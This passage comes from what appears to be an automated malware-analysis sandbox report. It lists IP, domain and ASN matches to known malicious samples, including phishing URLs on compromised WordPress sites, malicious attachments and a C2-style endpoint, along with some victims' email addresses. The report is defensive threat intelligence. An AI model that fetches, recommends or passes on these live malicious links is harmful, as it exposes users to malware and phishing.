          https://solisci.pl/static/8155709634/hckcl9086181-05369353-brlxdyqgid7day/Get hashmaliciousBrowse
          • 104.236.28.47:8080/G3kDfXyawUZt4wcjZoF
          https://triani.in/wp-admin/report/q4lk2j41/Get hashmaliciousBrowse
          • 104.236.28.47:8080/Z2OpCse

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          teeo.highoninfo.comhttp://mail.daw.lk/rainloop/docs/abzbl9903668066esolq17vvf/Get hashmaliciousBrowse
          • 104.31.69.30
          http://sparkplug.staging.rayportugal.com/wp-content/uploads/payment/7f04uyc9/g8l1900331414561161nv7pxvlyywrhgxf3k7/Get hashmaliciousBrowse
          • 104.31.68.30
          http://sparkplug.staging.rayportugal.com/wp-content/uploads/payment/7f04uyc9/g8l1900331414561161nv7pxvlyywrhgxf3k7/Get hashmaliciousBrowse
          • 104.31.68.30
          http://ssextintores.com.br/__old/wp-admin/css/colors/midnight/statement/dhxuoo5u/Get hashmaliciousBrowse
          • 104.31.68.30
          thebluebearyhillproject.comhttp://mail.daw.lk/rainloop/docs/abzbl9903668066esolq17vvf/Get hashmaliciousBrowse
          • 205.144.171.44
          waws-prod-sn1-081.cloudapp.nethttp://mail.daw.lk/rainloop/docs/abzbl9903668066esolq17vvf/Get hashmaliciousBrowse
          • 13.85.72.129
          http://sparkplug.staging.rayportugal.com/wp-content/uploads/payment/7f04uyc9/g8l1900331414561161nv7pxvlyywrhgxf3k7/Get hashmaliciousBrowse
          • 13.85.72.129
          http://sparkplug.staging.rayportugal.com/wp-content/uploads/payment/7f04uyc9/g8l1900331414561161nv7pxvlyywrhgxf3k7/Get hashmaliciousBrowse
          • 13.85.72.129
          http://ssextintores.com.br/__old/wp-admin/css/colors/midnight/statement/dhxuoo5u/Get hashmaliciousBrowse
          • 13.85.72.129

          ASN

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          unknownWhere are the female CEOs.docxGet hashmaliciousBrowse
          • 178.63.12.147
          updated W-9.docGet hashmaliciousBrowse
          • 162.241.95.113
          Purchase Orders 206584, 206585 and 206586.exeGet hashmaliciousBrowse
          • 35.198.186.120
          https://storage.googleapis.com/jjo00/dre.htmGet hashmaliciousBrowse
          • 162.241.65.229
          passware kit forensic 2020.1_63859.exeGet hashmaliciousBrowse
          • 104.18.45.18
          passware kit forensic 2020.1_63859.exeGet hashmaliciousBrowse
          • 104.18.45.18
          https://vatorr.com/?a=-1&oc=4271&c=15325&s1=TestGet hashmaliciousBrowse
          • 52.209.241.224
          https://jksfoodsandflavours.in/Kimberly/StoneGet hashmaliciousBrowse
          • 199.79.62.144
          Zc6IOC19MA.exeGet hashmaliciousBrowse
          • 34.240.41.135
          job_attach_n3s.jsGet hashmaliciousBrowse
          • 47.90.201.224
          su boleta de citaci#U00f3n (N#U00ba 00946745 ).vbsGet hashmaliciousBrowse
          • 186.147.55.19
          JVC_56453.vbsGet hashmaliciousBrowse
          • 216.10.243.36
          runGet hashmaliciousBrowse
          • 45.9.148.99
          http://olo00-pop0op0o.appspot.com#elizabeth.brown@grace.comGet hashmaliciousBrowse
          • 172.217.23.244
          9D4RPxqg4pGet hashmaliciousBrowse
          • 216.58.201.99
          Shipping_Document.htmlGet hashmaliciousBrowse
          • 177.11.49.50
          DOC130219-77625.htmGet hashmaliciousBrowse
          • 185.176.222.12
          Purchase Orders 206584, 206585 and 206586.exeGet hashmaliciousBrowse
          • 172.217.23.193
          http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exeGet hashmaliciousBrowse
          • 103.74.123.3
          http://t.mid.accor-mail.com/r/?id=h183a082d,cb39eee,f935f6d&p1=wefewfgwe5.azurewebsites.net/%25D9%2585%25D8%25B3%25D8%25A7%25D8%25A1%25D8%25A7%25D9%2584%25D8%25AE%25D9%258A%25D8%25B158mento-nadja.paulus%25D9%2585%25D8%25B3%25D8%25A7%25D8%25A1%25D8%25A7%25D9%2584%25D8%25AE%25D9%258A%25D8%25B1%26p2%3Dal-1%26p3%3Dal-mento%26p4%3Dal-mento%26p5%3D73ebc323e52870ddbc9af4d0b9f33a235879a03de828bf14009ed99f874dac48%2523nadja.paulus%40zehndergroup.comGet hashmaliciousBrowse
          • 52.173.77.140
          unknownWhere are the female CEOs.docxGet hashmaliciousBrowse
          • 178.63.12.147
          updated W-9.docGet hashmaliciousBrowse
          • 162.241.95.113
          Purchase Orders 206584, 206585 and 206586.exeGet hashmaliciousBrowse
          • 35.198.186.120
          https://storage.googleapis.com/jjo00/dre.htmGet hashmaliciousBrowse
          • 162.241.65.229
          passware kit forensic 2020.1_63859.exeGet hashmaliciousBrowse
          • 104.18.45.18
          passware kit forensic 2020.1_63859.exeGet hashmaliciousBrowse
          • 104.18.45.18
          https://vatorr.com/?a=-1&oc=4271&c=15325&s1=TestGet hashmaliciousBrowse
          • 52.209.241.224
          https://jksfoodsandflavours.in/Kimberly/StoneGet hashmaliciousBrowse
          • 199.79.62.144
          Zc6IOC19MA.exeGet hashmaliciousBrowse
          • 34.240.41.135
          job_attach_n3s.jsGet hashmaliciousBrowse
          • 47.90.201.224
          su boleta de citaci#U00f3n (N#U00ba 00946745 ).vbsGet hashmaliciousBrowse
          • 186.147.55.19
          JVC_56453.vbsGet hashmaliciousBrowse
          • 216.10.243.36
          runGet hashmaliciousBrowse
          • 45.9.148.99
          http://olo00-pop0op0o.appspot.com#elizabeth.brown@grace.comGet hashmaliciousBrowse
          • 172.217.23.244
          9D4RPxqg4pGet hashmaliciousBrowse
          • 216.58.201.99
          Shipping_Document.htmlGet hashmaliciousBrowse
          • 177.11.49.50
          DOC130219-77625.htmGet hashmaliciousBrowse
          • 185.176.222.12
          Purchase Orders 206584, 206585 and 206586.exeGet hashmaliciousBrowse
          • 172.217.23.193
          http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exeGet hashmaliciousBrowse
          • 103.74.123.3
          http://t.mid.accor-mail.com/r/?id=h183a082d,cb39eee,f935f6d&p1=wefewfgwe5.azurewebsites.net/%25D9%2585%25D8%25B3%25D8%25A7%25D8%25A1%25D8%25A7%25D9%2584%25D8%25AE%25D9%258A%25D8%25B158mento-nadja.paulus%25D9%2585%25D8%25B3%25D8%25A7%25D8%25A1%25D8%25A7%25D9%2584%25D8%25AE%25D9%258A%25D8%25B1%26p2%3Dal-1%26p3%3Dal-mento%26p4%3Dal-mento%26p5%3D73ebc323e52870ddbc9af4d0b9f33a235879a03de828bf14009ed99f874dac48%2523nadja.paulus%40zehndergroup.comGet hashmaliciousBrowse
          • 52.173.77.140

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.